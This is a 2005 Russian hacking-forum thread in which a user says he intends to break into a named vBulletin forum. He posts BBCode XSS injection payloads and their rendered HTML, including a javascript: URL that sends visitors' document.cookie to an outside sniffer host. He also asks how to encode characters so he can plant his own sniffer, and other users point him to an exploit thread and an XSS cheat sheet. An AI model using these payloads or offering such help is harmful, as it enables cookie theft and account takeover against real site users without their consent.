Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Проблемы с vBulletin (https://forum.antichat.xyz/showthread.php?t=11876)

KP0T 18.12.2005 03:49
Проблемы с vBulletin
 
Короче хочу ломануть вот этот форумчик _http://forum.polarnet.ru/

вот этот код
Код:
[HTML]http://www.wj.com]wj wj[/URL]
даёт нам что-то типа
Код:
[HTML]<A href='http://www.wj.com<a href="http://www.wj.com' target=_blank>wj
<FONT onmouseover=alert(/Hello_from_WJ/) face='"Arial' size=+7 &quot;>wj</FONT>"
target="_blank"&gt;http://www.wj.com]wj &lt;font face="Ar.../)
/"&gt;wj&lt;/font&gt;</A></A>
Отсюда делаем вывод что xxs возможна, но как снифер поюзать?! вот в чём вопрос, потому что код типа
Нехрена нам не даёт, а именно в сорцах всё смотрится так
Код:
[HTML]<A href='http://www.wj.com<a href="http://www.wj.com'
target=_blank>wj[FONT=Arial size=+7
style=background:url(javascript<B></B>:document.images[1].src="http://narod.ws/xss/s.gif?"+document.cookie);
/]wj [/FONT]" target="_blank"&gt;http://www.wj.com]wj[FONT=Arial...]wj
[/FONT</A>
Вообщем ай нид хелп.

KP0T 18.12.2005 04:09
Усё нашёл эксплойт на форуме, вот этот здесь http://www.forum.antichat.ru/threadnav11693-1-10.html

Тока теперь раскажите как шифровать эти спец символы, хочу свой снифак воткнуть.

Thesaurus 18.12.2005 04:25
http://ha.ckers.org/xss.html

V samom nizy. :rolleyes:

KP0T 18.12.2005 05:35
Сенкс большой

qBiN 18.12.2005 16:31
ПРоблема решена,тему закрываю


Время: 03:38